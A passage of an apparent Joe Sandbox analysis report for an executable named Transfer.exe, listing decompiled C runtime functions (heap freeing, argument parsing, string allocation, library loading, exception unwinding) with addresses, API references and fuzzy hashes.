				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x896648; // 0x89663c
					if(_t23 != 0) {
						E00886B10(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x89664c; // 0x897350
					if(_t24 != 0) {
						E00886B10(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x896650; // 0x897350
					if(_t25 != 0) {
						E00886B10(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x896678; // 0x896640
					if(_t26 != 0) {
						E00886B10(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x89667c; // 0x897354
					if(_t27 != 0) {
						return E00886B10(_t6);
					}
				}
				return _t6;
			}

0x00888bf4
0x00888bf9
0x00888bfd
0x00888c03
0x00888c06
0x00888c0b
0x00888c0f
0x00888c15
0x00888c18
0x00888c1d
0x00888c21
0x00888c27
0x00888c2a
0x00888c2f
0x00888c33
0x00888c39
0x00888c3c
0x00888c41
0x00888c42
0x00888c45
0x00888c4b
0x00000000
0x00888c53
0x00888c4b
0x00888c56

APIs

_free.LIBCMT ref: 00888C06

Part of subcall function 00886B10: HeapFree.KERNEL32(00000000,00000000,?,00888C85,?,00000000,?,00000000,?,00888CAC,?,00000007,?,?,0088910E,?), ref: 00886B26
Part of subcall function 00886B10: GetLastError.KERNEL32(?,?,00888C85,?,00000000,?,00000000,?,00888CAC,?,00000007,?,?,0088910E,?,?), ref: 00886B38

_free.LIBCMT ref: 00888C18
_free.LIBCMT ref: 00888C2A
_free.LIBCMT ref: 00888C3C
_free.LIBCMT ref: 00888C4E

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e6261b965afaa871ba3d21fe52b1df817d3e45d447bdb894a31a7059160e86e1
Instruction ID: 53635e5b9515f683788700e87cb080f9efc52be06ee7d69ff360706886d69068
Opcode Fuzzy Hash: e6261b965afaa871ba3d21fe52b1df817d3e45d447bdb894a31a7059160e86e1
Instruction Fuzzy Hash: F9F01272505200BB8665FB68E586C1673EEFB10764B980C0AF004D7505DF30FCA08764

Uniqueness

Uniqueness Score: -1.00%

Function 00886980 Relevance: 7.5, APIs: 5, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00886980(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0x896570; // 0xa9cd30
					if(_t7 != 0x896350) {
						E00886B10(_t7);
						 *0x896570 = 0x896350;
					}
				}
				E00886B10( *0x89736c);
				 *0x89736c = 0;
				E00886B10( *0x897370);
				 *0x897370 = 0;
				E00886B10( *0x897058);
				 *0x897058 = 0;
				E00886B10( *0x89705c);
				 *0x89705c = 0;
				return 1;
			}

0x00886989
0x0088698d
0x0088698f
0x0088699b
0x0088699e
0x008869a4
0x008869a4
0x0088699b
0x008869b0
0x008869bd
0x008869c3
0x008869ce
0x008869d4
0x008869df
0x008869e5
0x008869ed
0x008869f6

APIs

_free.LIBCMT ref: 0088699E

Part of subcall function 00886B10: HeapFree.KERNEL32(00000000,00000000,?,00888C85,?,00000000,?,00000000,?,00888CAC,?,00000007,?,?,0088910E,?), ref: 00886B26
Part of subcall function 00886B10: GetLastError.KERNEL32(?,?,00888C85,?,00000000,?,00000000,?,00888CAC,?,00000007,?,?,0088910E,?,?), ref: 00886B38

_free.LIBCMT ref: 008869B0
_free.LIBCMT ref: 008869C3
_free.LIBCMT ref: 008869D4
_free.LIBCMT ref: 008869E5

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bb4293c431e5f0f454d4331631974879bede9fc7dd045282a0a26478882698c2
Instruction ID: 72f41bf5df963eb5b93f64cdf60ce9543d4612d27e85f0e2cd2fe514a7ee6798
Opcode Fuzzy Hash: bb4293c431e5f0f454d4331631974879bede9fc7dd045282a0a26478882698c2
Instruction Fuzzy Hash: 44F0DAB0928560AF8E017F29BC128053BA4F70477974D0507F814D63B5EB325876AF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00885AFF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00885AFF(intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				intOrPtr* _t35;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				intOrPtr* _t43;
				intOrPtr* _t44;
				WCHAR* _t48;
				struct HINSTANCE__* _t49;
				struct HINSTANCE__* _t53;
				intOrPtr* _t56;
				struct HINSTANCE__* _t61;
				intOrPtr _t62;

				if(_a4 == 2 || _a4 == 1) {
					GetModuleFileNameW(0, 0x896ca8, 0x104);
					_t48 =  *0x897064; // 0xa81b8e
					 *0x897068 = 0x896ca8;
					if(_t48 == 0 ||  *_t48 == 0) {
						_t48 = 0x896ca8;
					}
					_v8 = 0;
					_v16 = 0;
					E00885C1E(_t48, 0, 0,  &_v8,  &_v16);
					_t61 = E00885DA4(_v8, _v16, 2);
					if(_t61 != 0) {
						E00885C1E(_t48, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t49 = E008878FF(_t48, 0, _t61);
							if(_t49 == 0) {
								_t56 = _v12;
								_t53 = 0;
								_t35 = _t56;
								if( *_t56 == 0) {
									L15:
									_t36 = 0;
									 *0x897054 = _t53;
									_v12 = 0;
									_t49 = 0;
									 *0x89705c = _t56;
									L16:
									E00886B10(_t36);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t35 = _t35 + 4;
									_t53 =  &(_t53->i);
								} while ( *_t35 != 0);
								goto L15;
							}
							_t36 = _v12;
							goto L16;
						}
						 *0x897054 = _v8 - 1;
						_t42 = _t61;
						_t61 = 0;
						 *0x89705c = _t42;
						goto L10;
					} else {
						_t43 = E008873D2();
						_push(0xc);
						_pop(0);
						 *_t43 = 0;
						L10:
						_t49 = 0;
						L17:
						E00886B10(_t61);
						return _t49;
					}
				} else {
					_t44 = E008873D2();
					_t62 = 0x16;
					 *_t44 = _t62;
					E008857A1();
					return _t62;
				}
			}

0x00885b0c
0x00885b3a
0x00885b40
0x00885b46
0x00885b4e
0x00885b55
0x00885b55
0x00885b5a
0x00885b61
0x00885b68
0x00885b7a
0x00885b81
0x00885ba0
0x00885bac
0x00885bc7
0x00885bca
0x00885bd1
0x00885bd7
0x00885bde
0x00885be1
0x00885be3
0x00885be7
0x00885bf1
0x00885bf1
0x00885bf3
0x00885bf9
0x00885bfc
0x00885bfe
0x00885c04
0x00885c05
0x00885c0b
0x00000000
0x00000000
0x00000000
0x00000000
0x00885be9
0x00885be9
0x00885be9
0x00885bec
0x00885bed
0x00000000
0x00885be9
0x00885bd9
0x00000000
0x00885bd9
0x00885bb2
0x00885bb7
0x00885bb9
0x00885bbb
0x00000000
0x00885b83
0x00885b83
0x00885b88
0x00885b8a
0x00885b8b
0x00885bc0
0x00885bc0
0x00885c0e
0x00885c0f
0x00000000
0x00885c18
0x00885b14
0x00885b14
0x00885b1b
0x00885b1c
0x00885b1e
0x00000000
0x00885b23

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Pictures\Transfer.exe,00000104), ref: 00885B3A
_free.LIBCMT ref: 00885C05
_free.LIBCMT ref: 00885C0F

Strings

C:\Users\user\Pictures\Transfer.exe, xrefs: 00885B31, 00885B38, 00885B67, 00885B9F

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Pictures\Transfer.exe
API String ID: 2506810119-2486469672
Opcode ID: c06028cb3d177b2837d395a4ca083034c8d366366ea09e83faa2ebde22fa094d
Instruction ID: b1ca6bc313d6e2937f0203570d24602b526da8fb18b2a0506ea95ac4c45caace
Opcode Fuzzy Hash: c06028cb3d177b2837d395a4ca083034c8d366366ea09e83faa2ebde22fa094d
Instruction Fuzzy Hash: ED316C71A04A58EFCB21FF99D98589EBBBCFB94320B2440A6F904D7211D7708E44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00881E40 Relevance: 6.1, APIs: 4, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00881E40(signed int __ecx, signed int _a4, signed int _a8) {
				signed int _v8;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t30;
				signed int _t33;
				void* _t36;
				void* _t37;
				signed int _t38;
				signed int _t39;
				signed int _t41;
				signed int _t42;
				intOrPtr _t47;
				unsigned int _t51;
				signed int _t52;
				unsigned int _t57;
				signed int _t62;
				signed int _t68;
				signed int _t71;
				signed int _t73;
				void* _t74;
				intOrPtr _t75;

				_push(0xffffffff);
				_push(E0088E080);
				_push( *[fs:0x0]);
				_t75 = _t74 - 0xc;
				_push(_t51);
				_t30 =  *0x896004; // 0x239cc77c
				_push(_t30 ^ _t73);
				 *[fs:0x0] =  &_v16;
				_v20 = _t75;
				_t71 = __ecx;
				_v24 = __ecx;
				_t33 = _a4;
				_t68 = _t33 | 0x00000007;
				if(_t68 <= 0x7ffffffe) {
					_t51 =  *(__ecx + 0x14);
					_t57 = _t51 >> 1;
					_t64 = 0xaaaaaaab * _t68 >> 0x20 >> 1;
					__eflags = _t57 - 0xaaaaaaab * _t68 >> 0x20 >> 1;
					if(_t57 > 0xaaaaaaab * _t68 >> 0x20 >> 1) {
						_t68 = _t57 + _t51;
						__eflags = _t51 - 0x7ffffffe - _t57;
						if(_t51 > 0x7ffffffe - _t57) {
							_t68 = 0x7ffffffe;
						}
					}
				} else {
					_t68 = _t33;
				}
				_t11 = _t68 + 1; // 0x7fffffff
				_t36 = _t11;
				_v8 = 0;
				if(_t36 != 0) {
					__eflags = _t36 - 0x7fffffff;
					if(__eflags > 0) {
						_t36 = E008832DD(_t51, _t68, _t71, __eflags);
					}
					_t37 = _t36 + _t36;
					__eflags = _t37 - 0x1000;
					if(__eflags < 0) {
						_t38 = E008825B9(_t51, _t68, _t71, __eflags, _t37);
						_t75 = _t75 + 4;
						_t52 = _t38;
					} else {
						_t13 = _t37 + 0x23; // 0x23
						_t63 = _t13;
						__eflags = _t13 - _t37;
						if(__eflags <= 0) {
							E008832DD(_t51, _t68, _t71, __eflags);
						}
						_t47 = E008825B9(_t51, _t68, _t71, __eflags, _t63);
						_t75 = _t75 + 4;
						_t14 = _t47 + 0x23; // 0x23
						_t52 = _t14 & 0xffffffe0;
						 *((intOrPtr*)(_t52 - 4)) = _t47;
					}
				} else {
					_t52 = 0;
				}
				_t39 = _a8;
				if(_t39 != 0) {
					if( *(_t71 + 0x14) < 8) {
						_t62 = _t71;
					} else {
						_t62 =  *_t71;
					}
					if(_t39 != 0) {
						E0088D7F0(_t52, _t62, _t39 + _t39);
					}
				}
				_t40 =  *(_t71 + 0x14);
				if( *(_t71 + 0x14) >= 8) {
					E00881C00(_t52, _t64, _t68,  *_t71, _t40 + 1);
				}
				 *(_t71 + 0x14) = 7;
				 *(_t71 + 0x10) = 0;
				if( *(_t71 + 0x14) < 8) {
					_t41 = _t71;
				} else {
					_t41 =  *_t71;
				}
				 *_t41 = 0;
				_t42 = _a8;
				 *_t71 = _t52;
				 *(_t71 + 0x14) = _t68;
				 *(_t71 + 0x10) = _t42;
				if( *(_t71 + 0x14) >= 8) {
					_t71 = _t52;
				}
				 *((short*)(_t71 + _t42 * 2)) = 0;
				 *[fs:0x0] = _v16;
				return _t42;
			}

0x00881e43
0x00881e45
0x00881e50
0x00881e51
0x00881e54
0x00881e57
0x00881e5e
0x00881e62
0x00881e68
0x00881e6b
0x00881e6d
0x00881e70
0x00881e75
0x00881e7e
0x00881e84
0x00881e90
0x00881e92
0x00881e94
0x00881e96
0x00881e9d
0x00881ea2
0x00881ea4
0x00881ea6
0x00881ea6
0x00881ea4
0x00881e80
0x00881e80
0x00881e80
0x00881eab
0x00881eab
0x00881eae
0x00881eb7
0x00881ebd
0x00881ec2
0x00881ec4
0x00881ec4
0x00881ec9
0x00881ecb
0x00881ed0
0x00881ef3
0x00881ef8
0x00881efb
0x00881ed2
0x00881ed2
0x00881ed2
0x00881ed5
0x00881ed7
0x00881ed9
0x00881ed9
0x00881edf
0x00881ee4
0x00881ee7
0x00881eea
0x00881eed
0x00881eed
0x00881eb9
0x00881eb9
0x00881eb9
0x00881f25
0x00881f2a
0x00881f30
0x00881f36
0x00881f32
0x00881f32
0x00881f32
0x00881f3a
0x00881f41
0x00881f46
0x00881f3a
0x00881f49
0x00881f4f
0x00881f55
0x00881f55
0x00881f5a
0x00881f65
0x00881f6c
0x00881f72
0x00881f6e
0x00881f6e
0x00881f6e
0x00881f76
0x00881f79
0x00881f7c
0x00881f7e
0x00881f85
0x00881f88
0x00881f8a
0x00881f8a
0x00881f8e
0x00881f95
0x00881fa3

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00881EC4

Part of subcall function 008832DD: __CxxThrowException@8.LIBVCRUNTIME ref: 008832F4

Concurrency::cancel_current_task.LIBCPMT ref: 00881ED9
new.LIBCMT ref: 00881EDF
new.LIBCMT ref: 00881EF3

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: Concurrency::cancel_current_task$Exception@8Throw
String ID:
API String ID: 3339364867-0
Opcode ID: e41023959ddcc60b65a9717dcccf0fb91f033e86f044ce377e497b7a46d190cf
Instruction ID: 85cb289b0239fd3e0dfe890b3129c8169f234e3504c99aa1495af5b159e2d91f
Opcode Fuzzy Hash: e41023959ddcc60b65a9717dcccf0fb91f033e86f044ce377e497b7a46d190cf
Instruction Fuzzy Hash: F341A371A106049BCB24FF28D98966AB7FDFB44750B100B2DE856C7790EF70E906C761

Uniqueness

Uniqueness Score: -1.00%

Function 00888255 Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E00888255(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x897070 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x88fdc0 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x239cc77d
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x0088825a
0x0088825e
0x00888265
0x00888269
0x00888277
0x0088828d
0x00888291
0x008882ba
0x008882bc
0x008882c0
0x008882c3
0x008882c3
0x008882c9
0x008882cb
0x00000000
0x008882cc
0x00888293
0x0088829c
0x008882ab
0x0088829e
0x008882a1
0x008882a7
0x008882a7
0x008882af
0x00000000
0x008882b1
0x008882b4
0x008882b6
0x00000000
0x008882b6
0x008882af
0x0088826b
0x00888270
0x00000000

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,008881FC,?,00000000,00000000,00000000,?,008883F9,00000006,FlsSetValue), ref: 00888287
GetLastError.KERNEL32(?,008881FC,?,00000000,00000000,00000000,?,008883F9,00000006,FlsSetValue,00890278,00890280,00000000,00000364,?,00887100), ref: 00888293
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,008881FC,?,00000000,00000000,00000000,?,008883F9,00000006,FlsSetValue,00890278,00890280,00000000), ref: 008882A1

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: cb07b6311bb33e6ed8988ca7dc6b38976e9d6c346e8ab329a691c1be0da57bdf
Instruction ID: 8d5a9df872c3d27adeb15ccbfc422a0b58c6c9398378af2e0ef3ad2024942472
Opcode Fuzzy Hash: cb07b6311bb33e6ed8988ca7dc6b38976e9d6c346e8ab329a691c1be0da57bdf
Instruction Fuzzy Hash: 3E01A736612A26EFC7216B6DEC44A667799FF457A1F640630FA06D7142DB20D800C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 008835F7 Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E008835F7(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __ebp;
				void* _t25;
				void* _t28;
				void* _t29;
				intOrPtr _t30;
				void* _t31;
				intOrPtr* _t32;
				void* _t34;

				_t31 = __esi;
				_t29 = __edx;
				_t27 = __ebx;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E00883C46(__ebx, _t30, __esi);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E00884DF3(_t28);
				_push(_t31);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
				E00883E48(_t27, _t28, _t29, _t30, _t32);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E00883401(_t27, _t29, _t30, _t32, _t37);
				if(_t25 != 0) {
					E00884DC1(_t25, _t30);
					return _t25;
				}
				return _t25;
			}

0x008835f7
0x008835f7
0x008835f7
0x008835ff
0x00883602
0x00883604
0x00883607
0x0088360a
0x0088360b
0x0088360e
0x00883613
0x00883613
0x00883616
0x0088361a
0x0088361d
0x00883622
0x0088361f
0x0088361f
0x0088361f
0x00883625
0x0088362a
0x0088362b
0x0088362e
0x00883630
0x00883633
0x00883636
0x00883637
0x00883640
0x00883645
0x00883648
0x0088364e
0x00883651
0x00883654
0x00883657
0x00883658
0x0088365b
0x00883666
0x0088366a
0x00000000
0x0088366a
0x00883671

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0088360E

Part of subcall function 00883C46: ___AdjustPointer.LIBCMT ref: 00883C90

_UnwindNestedFrames.LIBCMT ref: 00883625
___FrameUnwindToState.LIBVCRUNTIME ref: 00883637
CallCatchBlock.LIBVCRUNTIME ref: 0088365B

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_880000_Transfer.jbxd

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: c818ee3c194d0a60d1f22e1fc4dc6d3ef6eda792af7de8886e093e75c8865d1b
Instruction ID: cf6c815606d457661b0178882003f8f7417fce98e818c016154eb8100169712a
Opcode Fuzzy Hash: c818ee3c194d0a60d1f22e1fc4dc6d3ef6eda792af7de8886e093e75c8865d1b
Instruction Fuzzy Hash: 7901E932000109BBCF12AF59CC01EDA7BBAFF58B54F154115F918A5221D736E961EBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00882090 Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00882090(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int* _v0;
				signed int _v12;
				char _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr* _v32;
				void* __ebp;
				intOrPtr _t29;
				signed int _t33;
				short* _t36;
				void* _t37;
				signed int _t39;
				signed int _t42;
				intOrPtr* _t43;
				signed int _t44;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t51;
				intOrPtr _t52;
				signed int _t53;
				intOrPtr* _t55;
				signed int _t56;
				signed int* _t58;
				signed int _t59;
				signed int _t60;
				signed int* _t66;
				signed int _t67;
				signed int _t70;
				intOrPtr _t72;
				signed int* _t73;
				signed int* _t74;
				signed int* _t76;
				intOrPtr* _t79;
				signed int _t83;

				_t78 = __esi;
				_t75 = __edi;
				_t72 = __edx;
				_t50 = __ebx;
				_t29 = _a4;
				if(_t29 != 0) {
					__eflags = _t29 - 0x7fffffff;
					if(__eflags > 0) {
						E008832DD(__ebx, __edi, __esi, __eflags);
						goto L8;
					} else {
						_t45 = _t29 + _t29;
						__eflags = _t45 - 0x1000;
						if(__eflags < 0) {
							return E008825B9(__ebx, __edi, __esi, __eflags, _t45);
						} else {
							_t55 = _t45 + 0x23;
							__eflags = _t55 - _t45;
							if(__eflags <= 0) {
								L8:
								E008832DD(_t50, _t75, _t78, __eflags);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(0xffffffff);
								_push(E0088E0B9);
								_push( *[fs:0x0]);
								_push(_t50);
								_push(_t78);
								_push(_t75);
								_t33 =  *0x896004; // 0x239cc77c
								_push(_t33 ^ _t83);
								 *[fs:0x0] =  &_v20;
								_t51 = _t72;
								_v28 = _t51;
								_t79 = _t55;
								_v32 = _t79;
								_v24 = 0;
								 *(_t79 + 0x10) = 0;
								 *(_t79 + 0x14) = 0;
								 *(_t79 + 0x14) = 7;
								__eflags =  *(_t79 + 0x14) - 8;
								 *(_t79 + 0x10) = 0;
								if( *(_t79 + 0x14) < 8) {
									_t36 = _t79;
								} else {
									_t36 =  *_t79;
								}
								_t56 = 0;
								 *_t36 = 0;
								_t76 = _v0;
								_v12 = 0;
								_t52 =  *((intOrPtr*)(_t51 + 0x10));
								_v24 = 1;
								__eflags =  *_t76;
								if( *_t76 != 0) {
									_t66 = _t76;
									_t74 =  &(_t66[0]);
									do {
										_t44 =  *_t66;
										_t66 =  &(_t66[0]);
										__eflags = _t44;
									} while (_t44 != 0);
									_t67 = _t66 - _t74;
									__eflags = _t67;
									_t56 = _t67 >> 1;
								}
								_t37 = _t56 + _t52;
								_t53 =  *(_t79 + 0x10);
								__eflags = _t53 - _t37;
								if(_t53 <= _t37) {
									__eflags =  *(_t79 + 0x14) - _t37;
									if( *(_t79 + 0x14) != _t37) {
										_t42 = E00881C60(_t79, _t37, 1);
										__eflags = _t42;
										if(_t42 != 0) {
											__eflags =  *(_t79 + 0x14) - 8;
											 *(_t79 + 0x10) = _t53;
											if( *(_t79 + 0x14) < 8) {
												_t43 = _t79;
											} else {
												_t43 =  *_t79;
											}
											__eflags = 0;
											 *((short*)(_t43 + _t53 * 2)) = 0;
										}
									}
								}
								_push(0xffffffff);
								E008824A0(_t53, _t79, _t76, _t79, _v28, 0);
								__eflags =  *_t76;
								if( *_t76 != 0) {
									_t58 = _t76;
									_t73 =  &(_t58[0]);
									do {
										_t39 =  *_t58;
										_t58 =  &(_t58[0]);
										__eflags = _t39;
									} while (_t39 != 0);
									_t59 = _t58 - _t73;
									__eflags = _t59;
									_t60 = _t59 >> 1;
								} else {
									_t60 = 0;
								}
								_push(_t60);
								_push(_t76);
								E00882370(_t53, _t79, _t76, _t79);
								 *[fs:0x0] = _v20;
								return _t79;
							} else {
								_t47 = E008825B9(__ebx, __edi, __esi, __eflags, _t55);
								_t3 = _t47 + 0x23; // 0x23
								_t70 = _t3 & 0xffffffe0;
								__eflags = _t70;
								 *((intOrPtr*)(_t70 - 4)) = _t47;
								return _t70;
							}
						}
					}
				} else {
					return 0;
				}
			}

0x00882090
0x00882090
0x00882090
0x00882090
0x00882093
0x00882098
0x008820a2
0x008820a7
0x008820e0
0x00000000
0x008820a9
0x008820a9
0x008820ab
0x008820b0
0x008820dd
0x008820b2
0x008820b2
0x008820b5
0x008820b7
0x008820e5
0x008820e5
0x008820ea
0x008820eb
0x008820ec
0x008820ed
0x008820ee
0x008820ef
0x008820f3
0x008820f5
0x00882100
0x00882104
0x00882105
0x00882106
0x00882107
0x0088210e
0x00882112
0x00882118
0x0088211a
0x0088211d
0x0088211f
0x00882122
0x00882129
0x00882130
0x00882137
0x0088213e
0x00882142
0x00882149
0x0088214f
0x0088214b
0x0088214b
0x0088214b
0x00882151
0x00882153
0x00882156
0x00882159
0x0088215c
0x0088215f
0x00882166
0x00882169
0x0088216b
0x0088216d
0x00882170
0x00882170
0x00882173
0x00882176
0x00882176
0x0088217b
0x0088217b
0x0088217d
0x0088217d
0x0088217f
0x00882182
0x00882185
0x00882187
0x00882189
0x0088218c
0x00882193
0x00882198
0x0088219a
0x0088219c
0x008821a0
0x008821a3
0x008821a9
0x008821a5
0x008821a5
0x008821a5
0x008821ab
0x008821ad
0x008821ad
0x0088219a
0x0088218c
0x008821b1
0x008821ba
0x008821bf
0x008821c3
0x008821c9
0x008821cb
0x008821d0
0x008821d0
0x008821d3
0x008821d6
0x008821d6
0x008821db
0x008821db
0x008821dd
0x008821c5
0x008821c5
0x008821c5
0x008821df
0x008821e0
0x008821e3
0x008821ed
0x008821fb
0x008820b9
0x008820ba
0x008820c2
0x008820c5
0x008820c5
0x008820c8
0x008820ce
0x008820ce
0x008820b7
0x008820b0
0x0088209a
0x0088209f
0x0088209f

APIs

new.LIBCMT ref: 008820BA

Memory Dump Source

Source File: 00000003.00000002.580938453.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true

Associated: 00000003.00000002.580930254.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580968768.0000000000896000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.580983190.0000000000898000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

